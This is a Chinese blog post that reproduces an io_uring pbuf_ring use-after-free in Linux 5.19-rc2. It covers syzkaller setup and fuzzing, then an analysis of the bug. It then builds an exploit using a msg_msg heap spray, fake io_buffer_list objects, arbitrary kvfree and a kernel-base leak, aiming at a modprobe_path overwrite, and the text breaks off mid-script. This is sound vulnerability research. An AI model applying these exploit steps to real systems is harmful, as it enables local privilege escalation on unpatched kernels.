0%

fuzz工具syzkaller的使用+io_uring模块UAF漏洞

io_uring 模块 pbuf_ring 漏洞

本篇博客主要对以下文章的内容进行复现:

1
2
/ $ uname -r
5.19.0-rc2
1
2
3
4
5
6
7
8
9
10
qemu-system-x86_64 \
-m 512M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 panic=-1 pti=on nokaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=4 -s
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -t devpts devpts /dev/pts

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

内核源码下载:https://src.fedoraproject.org/repo/pkgs/kernel/linux-5.19-rc2.tar.xz/

  • 该漏洞已经在 5.19-rc8 中被修复
  • 在编译内核前需要先将修复的部分还原
  • 内核编译选项如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
CONFIG_KCOV=y        
CONFIG_VIRTIO_NET=y
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y

# 可选
CONFIG_DEBUG_INFO=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y

# 关闭
# CONFIG_SLAB_FREELIST_RANDOM is not set
# CONFIG_SLAB_FREELIST_HARDENED is not set

io_uring 模块的使用

IO uring(Unified Resource Gestion)是一个 Linux 内核功能,它允许异步 I/O 操作,从而提高系统性能

  • io_uring 的使用案例包括文件读写、网络通信、数据库连接等
  • io_uring 通过使用用户空间和内核之间的通信机制,允许用户空间应用程序在异步 I/O 操作完成后立即获取结果,而无需等待内核完成磁盘操作或其他内核操作

io_uring 的实现仅仅使用了三个 syscall:

  • io_uring_setup:设置 io_uring 上下文
  • io_uring_enter:提交并获取完成任务
  • io_uring_register:注册内核用户共享的缓冲区

基于共享内存,io_uring 维护了两个与内核共享的队列:

  • submit 队列:用于存储待提交的 I/O 请求
  • completion 队列:用于存储 I/O 请求的完成状态

submit 队列中的 I/O 请求与 completion 队列中的 I/O 完成事件之间也没有固定的对应关系,内核会根据 I/O 请求的类型、文件描述符、线程池等信息自动将 I/O 请求分配到合适的队列中

  • 由于 submit / completion 队列属于用户态程序与内核的共享空间
  • 内核只需要读取 submit 队列中的参数就可以执行相应的内核态函数,不需要执行系统调用
  • 当数据执行完毕时,内核又会将返回数据写入 completion 队列

使用案例如下:(文件读写)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
// gcc -o io_uring io_uring.c -luring -fno-stack-protector -no-pie -g
#include <fcntl.h>
#include <io_uring.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 1024

int main() {
char *filename = "test.txt";
char *buf = malloc(BUF_SIZE);
struct io_uring_params params;
struct io_uring *ring;
int ret;

memset(&params, 0, sizeof(params));
params.sq_entries = 1;
params.cq_entries = 1;
params.flags = IORING_FLAG_NONBLOCK;

ret = io_uring_setup(&params, &ring); /* 初始化io_uring */
if (ret < 0) {
perror("io_uring_setup");
return 1;
}

ret = io_uring_register_files(ring, 1, &filename[0]); /* 打开一个文件 */
if (ret < 0) {
perror("io_uring_register_files");
return 1;
}

struct io_uring_sqe sqe = {0};
sqe.op = IORING_OP_READ; /* io_uring命令 */
sqe.fd = 0; /* io_uring文件描述符 */
sqe.off = 0; /* 偏移 */
sqe.addr = buf; /* 读取地址 */
sqe.len = BUF_SIZE; /* 长度 */

ret = io_uring_submit_sqe(ring, &sqe); /* 底层使用io_uring_enter系统调用 */
if (ret < 0) {
perror("io_uring_submit_sqe");
return 1;
}

struct io_uring_cqe cqe;
while (1) {
ret = io_uring_peek_cqe(ring, &cqe);
if (ret == -1) {
if (errno == EAGAIN) {
continue;
}
perror("io_uring_peek_cqe");
return 1;
}

if (cqe.err < 0) {
fprintf(stderr, "read: %s\n", strerror(cqe.err));
break;
}

printf("%s", buf);
break;
}

io_uring_cancel(ring, 0);
io_uring_queue_exit(ring);
free(buf);
return 0;
}

syzkaller 的安装与使用

syzkaller 是一个用于自动生成内核错误测试用例的 fuzz 工具,它通过利用目标内核的漏洞来生成测试用例,这些测试用例可以用于测试内核的安全性

syzkaller 的主要功能包括自动生成、测试和报告内核错误

syzkaller 使用 Go 语言编写,因此需要获取 go 语言的 tool chain(经过测试,现在最新版的 syzkaller 需要 1.19 版本的 go 环境)

1
2
3
4
wget -c https://dl.google.com/go/go1.19.2.linux-amd64.tar.gz
tar -xf go1.19.2.linux-amd64.tar.gz
sudo cp go/bin/go /usr/local/bin
sudo cp -r go /usr/local

安装 syzkaller:

1
2
3
git clone https://github.com/google/syzkaller
cd syzkaller
make

编译完成后,在 syzkaller 目录下会出现一个 bin 目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
bin
├── linux_amd64
│   ├── syz-execprog
│   ├── syz-executor
│   ├── syz-fuzzer
│   └── syz-stress
├── syz-db
├── syz-manager
├── syz-mutate
├── syz-prog2c
├── syz-repro
├── syz-runtest
├── syz-sysgen
└── syz-upgrade
  • 如果 syzkaller/bin 目录下,没有 syz-extractsyz-sysgen 这两个文件的话,需要执行如下命令编译:
1
2
make bin/syz-extract
make bin/syz-sysgen

使用 syzkaller 前,先新建一个 workdir 目录,并新建一个 config 文件用于配置运行所需参数(命名为 test.cfg)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"target": "linux/amd64",
"http": "127.0.0.1:56741",
"rpc": "127.0.0.1:0",
"sshkey" : "/home/yhellow/pwntest/image/bullseye.id_rsa", /* ssh key */
"workdir": "/home/yhellow/pwntest/workdir", /* 本地工作目录 */
"kernel_obj": "/home/yhellow/pwntest/code/linux-5.19-rc2", /* 内核源码位置 */
"syzkaller": "/home/yhellow/Tools/syzkaller", /* syzkaller工具目录 */
"sandbox": "setuid",
"type": "isolated",
"vm": {
"targets" : [ "127.0.0.1:10021" ], /* 虚拟机ip:10021 */
"pstore": false,
"target_dir" : "/root/fuzzdir", /* 虚拟机工作目录 */
"target_reboot" : false
}
}

在开始 fuzz 之前需要先配置 Imgage 镜像

首先安装 debootstrap,它是 linux 下用来构建一套基本根文件系统的工具:

1
sudo apt-get install debootstrap

之后在 linux 项目目录下键入以下命令,以创建 Debian Stretch Linux image:

1
2
3
wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh
chmod +x create-image.sh
./create-image.sh

上述操作全部完成后,执行以下命令来尝试启动:

1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 2G \
-smp 2 \
-kernel ./bzImage \
-append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \
-drive file=./image/bullseye.img,format=raw \
-net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
-net nic,model=e1000 \
-enable-kvm \
-nographic \
-pidfile vm.pid 2>&1 | tee vm.log

然后测试 ssh 能否成功工作,因为 syzkaller 会用到 ssh:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  pwntest ssh -i ./image/bullseye.id_rsa -p 10021 -o "StrictHostKeyChecking no" root@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:jAtZl0868l4KSK75H0o0bE+7bXydTB4iDwkp68qT2Dk.
Please contact your system administrator.
Add correct host key in /home/yhellow/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/yhellow/.ssh/known_hosts:1
remove with:
ssh-keygen -f "/home/yhellow/.ssh/known_hosts" -R "[localhost]:10021"
Password authentication is disabled to avoid man-in-the-middle attacks.
Keyboard-interactive authentication is disabled to avoid man-in-the-middle attacks.
Linux syzkaller 5.19.2 #10 SMP PREEMPT_DYNAMIC Thu Dec 7 02:17:49 CST 2023 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
A valid context for root could not be obtained.
Last login: Wed Dec 6 18:22:26 2023
root@syzkaller:~#

如果遇到以下报错可以参考如下的解决方案:

1
kex_exchange_identification: read: Connection reset by peer

先启动内核,后启动 fuzz:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
➜  pwntest /home/yhellow/Tools/syzkaller/bin/syz-manager -config=test.cfg
2023/12/07 02:53:47 loading corpus...
2023/12/07 02:53:47 serving http on http://127.0.0.1:56741
2023/12/07 02:53:47 serving rpc on tcp://127.0.0.1:39647
2023/12/07 02:53:47 booting test machines...
2023/12/07 02:53:47 wait for the connection from test machine...
2023/12/07 02:54:01 machine check:
2023/12/07 02:54:01 syscalls : 2123/4451
2023/12/07 02:54:01 code coverage : enabled
2023/12/07 02:54:01 comparison tracing : CONFIG_KCOV_ENABLE_COMPARISONS is not enabled
2023/12/07 02:54:01 extra coverage : enabled
2023/12/07 02:54:01 delay kcov mmap : enabled
2023/12/07 02:54:01 setuid sandbox : enabled
2023/12/07 02:54:01 namespace sandbox : enabled
2023/12/07 02:54:01 Android sandbox : enabled
2023/12/07 02:54:01 fault injection : CONFIG_FAULT_INJECTION is not enabled
2023/12/07 02:54:01 leak checking : CONFIG_DEBUG_KMEMLEAK is not enabled
2023/12/07 02:54:01 net packet injection : /dev/net/tun does not exist
2023/12/07 02:54:01 net device setup : enabled
2023/12/07 02:54:01 concurrency sanitizer : /sys/kernel/debug/kcsan does not exist
2023/12/07 02:54:01 devlink PCI setup : PCI device 0000:00:10.0 is not available
2023/12/07 02:54:01 NIC VF setup : PCI device 0000:00:11.0 is not available
2023/12/07 02:54:01 USB emulation : /dev/raw-gadget does not exist
2023/12/07 02:54:01 hci packet injection : /dev/vhci does not exist
2023/12/07 02:54:01 wifi device emulation : /sys/class/mac80211_hwsim/ does not exist
2023/12/07 02:54:01 802.15.4 emulation : /sys/bus/platform/devices/mac802154_hwsim does not exist
2023/12/07 02:54:01 swap file : enabled
2023/12/07 02:54:01 corpus : 179 (deleted 0 broken)

开始 fuzz 后,在 http://127.0.0.1:56741/ 可以查看详细信息:

1701887988901

syscall description 的编写

syzkaller 自己定义了一套描述系统调用模版的声明式语言 syzlang

  • 为了提高 fuzz 效率,我们必须为目标系统量身定制这种声明文件
  • 通常一个设备节点对应一个声明文件
  • 所谓的声明文件就是一个 txt,根据 syzkaller 定义的语法,在这个 txt 文档中描述设备节点的接口信息以及参数格式

整个定制过程分为4步:

  1. 根据目标内核模块的信息,撰写符合 syzlang 语法的 txt 声明文件
  2. syz-extract 根据 txt 及 linux 源码,提取符号常量的值,生成中间文件(.const 文件)
  3. syz-sysgen 根据 const 文件生成 syzkaller 执行时使用的 go 文件
  4. 重新编译 syzkaller

使用如下命令编译自定义模块:

1
bin/syz-extract -os linux -arch amd64 -sourcedir "/home/yhellow/pwntest/code/linux-5.19.2" test.txt

编译完成后运行 syz-sysgen,然后重新编译 syzkaller:

1
2
3
bin/syz-sysgen
make generate
make
  • 该步骤将更新 /syzkaller/sys/linux/gen/amd64.go,自动添加上新定义的系统调用

syzkaller 源码中的 /syzkaller/sys/linux 目录下专门记录有各个常用模块的 syzlang 文档(已经编译完成),本实验我们需要使用 io_uring.txt

为了提高 fuzz 效率,增加了 “enable_syscalls” 项,只允许某些系统调用,能更快地触发漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
"target": "linux/amd64",
"http": "127.0.0.1:56741",
"rpc": "127.0.0.1:0",
"sshkey" : "/home/yhellow/pwntest/image/bullseye.id_rsa",
"workdir": "/home/yhellow/pwntest/workdir",
"kernel_obj": "/home/yhellow/pwntest/code/linux-5.19-rc2",
"syzkaller": "/home/yhellow/Tools/syzkaller",
"sandbox": "setuid",
"type": "isolated",
"enable_syscalls":[
"io_uring_register$IORING_REGISTER_PBUF_RING", /* 漏洞所在模块 */
"io_uring_setup"
],
"vm": {
"targets" : [ "127.0.0.1:10021" ],
"pstore": false,
"target_dir" : "/root/fuzzdir",
"target_reboot" : false
}
}

分析 crash 文件

所有 fuzz 出的 crash 信息都存储在 /workdir/crashes

当 syzkaller fuzz 遇到 crash 后会尝试复现该 crash:(并不是每一次都能成功)

1701933275474

当 syzkaller 成功复现 crash 时,会出现如下信息:

1701933554055

  • PS:有时候复现的 C 代码特别奇怪,也不能触发 crash,不能完全采信

漏洞分析

分析核心系统调用 syscall(__NR_io_uring_register) 对应的内核源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

/*
* We're inside the ring mutex, if the ref is already dying, then
* someone else killed the ctx or is already going through
* io_uring_register().
*/
if (percpu_ref_is_dying(&ctx->refs))
return -ENXIO;

if (ctx->restricted) {
if (opcode >= IORING_REGISTER_LAST)
return -EINVAL;
opcode = array_index_nospec(opcode, IORING_REGISTER_LAST);
if (!test_bit(opcode, ctx->restrictions.register_op))
return -EACCES;
}

switch (opcode) {
......
case IORING_REGISTER_PBUF_RING:
ret = -EINVAL;
if (!arg || nr_args != 1)
break;
ret = io_register_pbuf_ring(ctx, arg); /* 漏洞函数 */
break;
......
default:
ret = -EINVAL;
break;
}

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
static int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_ring *br;
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;
struct page **pages;
int nr_pages;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

if (reg.pad || reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) { /* 为io uring context分配io buffer list对象数组 */
int ret = io_init_bl_list(ctx); /* 这里分配了ctx->io_bl[64] */
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid); /* 根据提供的buffer group id找到对应的缓冲区链表 */
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->buf_nr_pages || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

pages = io_pin_pages(reg.ring_addr,
struct_size(br, bufs, reg.ring_entries),
&nr_pages); /* 分配FOLL_PIN的页 */
if (IS_ERR(pages)) {
kfree(bl);
return PTR_ERR(pages);
}

br = page_address(pages[0]); /* buffer ring所在地址 */
bl->buf_pages = pages;
bl->buf_nr_pages = nr_pages;
bl->nr_entries = reg.ring_entries;
bl->buf_ring = br;
bl->mask = reg.ring_entries - 1;
io_buffer_add_list(ctx, bl, reg.bgid); /* 设置bl->bgid=reg.bgid,并将其添加到ctx的XArray中 */
return 0;
}
  • 首先检查传入的参数,并在 io_uring_context 中分配 io_buffer_list 对象数组 ctx->io_bl
  • 然后根据参数中的缓冲区组ID找到对应的 io_buffer_list 对象
  • 然后调用 io_pin_pages 尝试根据用户给定的地址和长度分配 FOLL_PIN 的页
  • 如果分配分配失败,就直接释放掉 io_buffer_list 对象(变量 bl 指向的是对象数组中的一项,不能单独释放,因而触发报错)

变量 bl=&ctx->io_bl[bgid],如果 bgid=0,就可以释放整个 ctx->io_bl(不会触发报错),但是释放之后并没有清除 ctx->io_bl,后续使用就会造成 UAF

  • PS:从后续修复的代码来看,设计者可能只是想释放由 kzalloc(sizeof(*bl), GFP_KERNEL) 申请的内存,但是没有考虑周全

入侵思路

有 UAF 的对象大小为 0x800(使用 kmalloc-2k),可以尝试利用 msg_msg 占用 UAF 堆块,然后利用 io_provide_buffers() 在链表 ctx->io_bl[0].buf_list 上添加一个 io_buffer 对象

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
   init_io_uring();

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msgid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

do_free_first();

puts("try to get UAF object");

struct msgbuf* msg = (struct msgbuf*)buffer;
int msg_len = 0x420 - 0x30;
msg->mtype = 0x0001;
memset(msg->mtext, '\x00', msg_len);
msgsnd(msgid[0], msg, msg_len, 0);

/* 将io_buffer链接到ctx->io_bl[0],伪造一个msg_msg对象 */
void* pbuf = do_mmap(PBUF_BASE, PAGE_SIZE);
sqes->opcode = IORING_OP_PROVIDE_BUFFERS;
sqes->rw_flags = 0;
sqes->splice_fd_in = 0;
sqes->fd = 1;
sqes->addr = pbuf; // io_buffer->addr对应msg_msg->m_type
sqes->len = 0xFD0; // io_buffer->len对应msg_msg->m_ts
sqes->buf_group = 0; // 链接到ctx->io_bl[buf_group](这里'0'对应msg_msg的头部, 可以伪造msg_msg)
submit_provide_buffer();

/* 从ctx->io_buffer_cache中分配两对象,获取指向ctx->io_bl[33]的指针,从而找到kmalloc-2k的地址 */
for (int i = 0; i < 0x2; i++) {
sqes->addr = malloc(0x100);
sqes->len = 0x100;
sqes->buf_group = 0x21; /* 0x420后面的都是可用的io_buffer_list(没有被msg_msg覆盖),因此链接到0x420这个位置(0x420/0x20=0x21) */
submit_provide_buffer();
}

puts("submit_provide_buffer");

uint64_t* tag = (uint64_t*)(buffer + 0xF00);
*tag = 0xdeadbeef;
pthread_t th;
pthread_create(&th, NULL, worker, buffer);

while (*tag == 0xdeadbeef) ;

正常状态下的 io_buffer_list

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:0000│ rdi rbp 0xffff8880059f6800 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff8880059f6800 ◂— 0xffff8880059f6800
02:00100xffff8880059f6810 ◂— 0x0
03:00180xffff8880059f6818 ◂— 0x0
04:00200xffff8880059f6820 ◂— 0xffff8880059f6820
05:00280xffff8880059f6828 —▸ 0xffff8880059f6820 ◂— 0xffff8880059f6820
06:00300xffff8880059f6830 ◂— 0x1
07:00380xffff8880059f6838 ◂— 0x0

msg_msg 覆盖后:

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:00000xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff8880059d56c0 —▸ 0xffff8880059f6800 ◂— 0xffff8880059d56c0
02:00100xffff8880059f6810 ◂— 0x1
03:00180xffff8880059f6818 ◂— 0x3f0
04:00200xffff8880059f6820 ◂— 0x0
05:00280xffff8880059f6828 —▸ 0xffff8880051ab548 ◂— 0x1
06:00300xffff8880059f6830 ◂— 0x0
07:00380xffff8880059f6838 ◂— 0x0
  • msg_msg 覆盖大小为 0x420,后续的 io_buffer_list 正常
1
2
3
4
5
6
7
pwndbg> telescope 0xffff8880059f6800+0x420
00:00000xffff8880059f6c20 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 ◂— 0xffff8880059f6c20
01:00080xffff8880059f6c28 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 ◂— 0x0
02:00100xffff8880059f6c30 ◂— 0x21 /* '!' */
03:00180xffff8880059f6c38 ◂— 0x0
04:00200xffff8880059f6c40 ◂— 0xffff8880059f6c40
05:00280xffff8880059f6c48 —▸ 0xffff8880059f6c40 ◂— 0xffff8880059f6c40

添加 io_buffer 对象后:

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:00000xffff8880059f6800 —▸ 0xffff8880059d56c0 —▸ 0xffff888005a16000 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff888005a16000 —▸ 0xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0x0
02:00100xffff8880059f6810 ◂— 0x1
03:00180xffff8880059f6818 ◂— 0x3f0
04:00200xffff8880059f6820 ◂— 0x0
05:00280xffff8880059f6828 —▸ 0xffff8880051ab548 ◂— 0x1
06:00300xffff8880059f6830 ◂— 0x0
07:00380xffff8880059f6838 ◂— 0x0
  • 对于 msg_msg 而言,程序会误以为 io_buffer 对象也是 msg_msg 结构体
  • 打印位于 ctx->io_buffer_cacheio_buffer 对象:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> telescope 0xffff888005a16000
/* 第1个io_buffer对象 */
00:00000xffff888005a16000 —▸ 0xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0xffff888005a16000
01:00080xffff888005a16008 —▸ 0xffff8880059d56c0 —▸ 0xffff888005a16000 —▸ 0xffff8880059f6800 ◂— 0x0
02:00100xffff888005a16010 —▸ 0x1000 (cpu_debug_store) ◂— 0x0
03:00180xffff888005a16018 ◂— 0xfd0
/* 第2个io_buffer对象 */
04:00200xffff888005a16020 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 ◂— 0xffff888005a16020
05:00280xffff888005a16028 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 ◂— 0x0
06:00300xffff888005a16030 —▸ 0x1bd2b80 ◂— 0x0
07:00380xffff888005a16038 ◂— 0x21000000000100
/* 第3个io_buffer对象 */
08:00400xffff888005a16040 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 ◂— 0xffff888005a16040
09:00480xffff888005a16048 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 ◂— 0x0
0a:00500xffff888005a16050 —▸ 0x1bd2c90 ◂— 0x0
0b:00580xffff888005a16058 ◂— 0x21000000000100
  • 新添加的第2,3个 io_buffer 对象都会链接到 ctx->io_bl[33] 构成循环链表,利用这一点可以泄露 ctx->io_bl 的地址(UAF 对象的地址)

接下来我想尝试正常释放 ctx->io_bl 并用其他内核结构体占位,但不管是 io_unregister_pbuf_ring 还是 io_destroy_buffers 都会因为 io_buffer_list 的结构被破坏而执行失败

这里文章采用的利用思路是:

  • 利用 msg_msg 伪造 io_buffer_list 对象
  • 然后通过 kvfree(bl->buf_pages) 获取 kmalloc-2k 上的任意地址 free
  • 构造对象重叠以备后续利用

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
    msg_len = 0x800 - 0x30;
memset(msg->mtext, 0x00, msg_len);
msgsnd(msgid[2], msg, msg_len, 0); /* 创建new msg_msg */

int spray_uring_fd;
struct io_uring_params p;
memset(&p, 0, sizeof(p));
spray_uring_fd = io_uring_setup(0x1, &p); /* 创建io_ring_ctx */
/* ps:由于没有开启slub随机化,UAF msg_msg,new msg_msg,io_ring_ctx,三者相邻 */

ret = msgrcv(msgid[0], buffer, PAGE_SIZE, (long)0x0001, 0); /* 释放UAF msg_msg */

#define IDX(x) (((x)-0x30) / 8)

uint64_t* tmp = (uint64_t*)msg->mtext; // 伪造io_buffer_list
tmp[IDX(0x40)] = io_bl + 0x60; // fake_bl.buf_pages
tmp[IDX(0x48)] = io_bl; // fake_bl.buf_ring(指向可读区域)
tmp[IDX(0x50)] = 0x10000; // fake_bl.buf_nr_pages = 1
tmp[IDX(0x60)] = io_bl + 0x68; // 被当做buf_pages[0]
tmp[IDX(0x68)] = 0xdeadbeef; // 被当做page对象

tmp[IDX(0x80)] = io_bl + 0xa0; // fake_bl.buf_pages
tmp[IDX(0x88)] = io_bl; // fake_bl.buf_ring(指向可读区域)
tmp[IDX(0x90)] = 0x10000; // fake_bl.buf_nr_pages = 1
tmp[IDX(0xa0)] = io_bl + 0x1000; // 被当做buf_pages[0]

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[1], msg, msg_len, 0); /* 重新申请UAF msg_msg */

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.bgid = 0x2;
ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, &reg, 1); /* 利用__io_remove_buffers()进行任意地址kvfree() */

打印 UAF 对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> telescope 0xffff888005a33800
00:00000xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
01:00080xffff888005a33808 —▸ 0xffff8880059e54c0 —▸ 0xffff888005a33800 ◂— 0xffff8880059e54c0
02:00100xffff888005a33810 ◂— 0x1
03:00180xffff888005a33818 ◂— 0x7d0
04:00200xffff888005a33820 ◂— 0x0
05:00280xffff888005a33828 —▸ 0xffff88800586a288 ◂— 0x1
06:00300xffff888005a33830 ◂— 0x0
07:00380xffff888005a33838 ◂— 0x0
08:00400xffff888005a33840 —▸ 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
09:00480xffff888005a33848 —▸ 0xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
0a:00500xffff888005a33850 ◂— 0x10000
0b:00580xffff888005a33858 ◂— 0x0
0c:00600xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
0d:00680xffff888005a33868 ◂— 0xdeadbeef
0e:00700xffff888005a33870 ◂— 0x0
0f:00780xffff888005a33878 ◂— 0x0
10:00800xffff888005a33880 —▸ 0xffff888005a338a0 —▸ 0xffff888005a34800 ◂— 0x607fe0c00e60
11:00880xffff888005a33888 —▸ 0xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
12:00900xffff888005a33890 ◂— 0x10000
13:00980xffff888005a33898 ◂— 0x0
14:00a0│ 0xffff888005a338a0 —▸ 0xffff888005a34800 ◂— 0x607fe0c00e60
  • 此时已经成功伪造了 io_buffer_list
1
2
3
4
5
0xffffffff8132fb6f <__io_uring_register+623>    call   __io_remove_buffers.isra.0           >
rdi: 0xffff888005a33840 —▸ 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
rsi: 0xffffffff
rdx: 0xffff888005804880 ◂— 0x8
rcx: 0xffffffff8132fb64 (__io_uring_register+612) ◂— mov esi, 0xffffffff
1
2
3
4
5
0xffffffff81325ebe <__io_remove_buffers.isra.0+270>    call   kvfree            <kvfree>
rdi: 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
rsi: 0x0
rdx: 0xffff888005804880 ◂— 0x8
rcx: 0xffffffff81325eb8 (__io_remove_buffers.isra.0+264) ◂— mov rdi, qword ptr [rbx]
  • 这里将会释放 io_buffer_list 内部的内存区域,实现堆重叠

利用堆重叠可以覆盖位于 UAF msg_msg 下方的另一个 msg_msg,然后溢出读取这个 msg_msg 下方的 io_ring_ctx 对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
tmp = (uint64_t*)msg->mtext; /* 申请到msg_msg+0x60,覆盖new msg_msg */
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; // 自旋指针,worker继续卡死,不然会导致crash

tmp[IDX(0x800 - 0x60)] = io_bl + 0x830; // fake_msg.m_list.prev
tmp[IDX(0x808 - 0x60)] = io_bl + 0x830; // fake_msg.m_list.next
tmp[IDX(0x810 - 0x60)] = 0x00001; // fake_msg.m_type
tmp[IDX(0x818 - 0x60)] = 0xFD0; // fake_msg.m_ts
tmp[IDX(0x820 - 0x60)] = 0; // fake_msg.next
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // fake_msg.security(指向可读区域)
tmp[IDX(0x830 - 0x60)] = io_bl + 0x800; // 伪造循环链表节点
tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[3], msg, msg_len, 0);

msgrcv(msgid[2], buffer, PAGE_SIZE, (long)0x0001, 0);
uint64_t* io_ring_ctx = (uint64_t*)(buffer + 0x8 + 0x800 - 0x30);
print_hex(io_ring_ctx, 0x200);

计算出内核基地址后,就可以考虑打 msg_msg unlink attack,往 modprobe_path 中写入自定义脚本的路径

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msg_len = 0x800 - 0x30;
memset(msg->mtext, 'a', msg_len);
msgsnd(msgid[4], msg, msg_len, 0);

ret = msgrcv(msgid[3], buffer, msg_len, /* msg_type= */ (long)0x0001, 0);

tmp = (uint64_t*)msg->mtext;
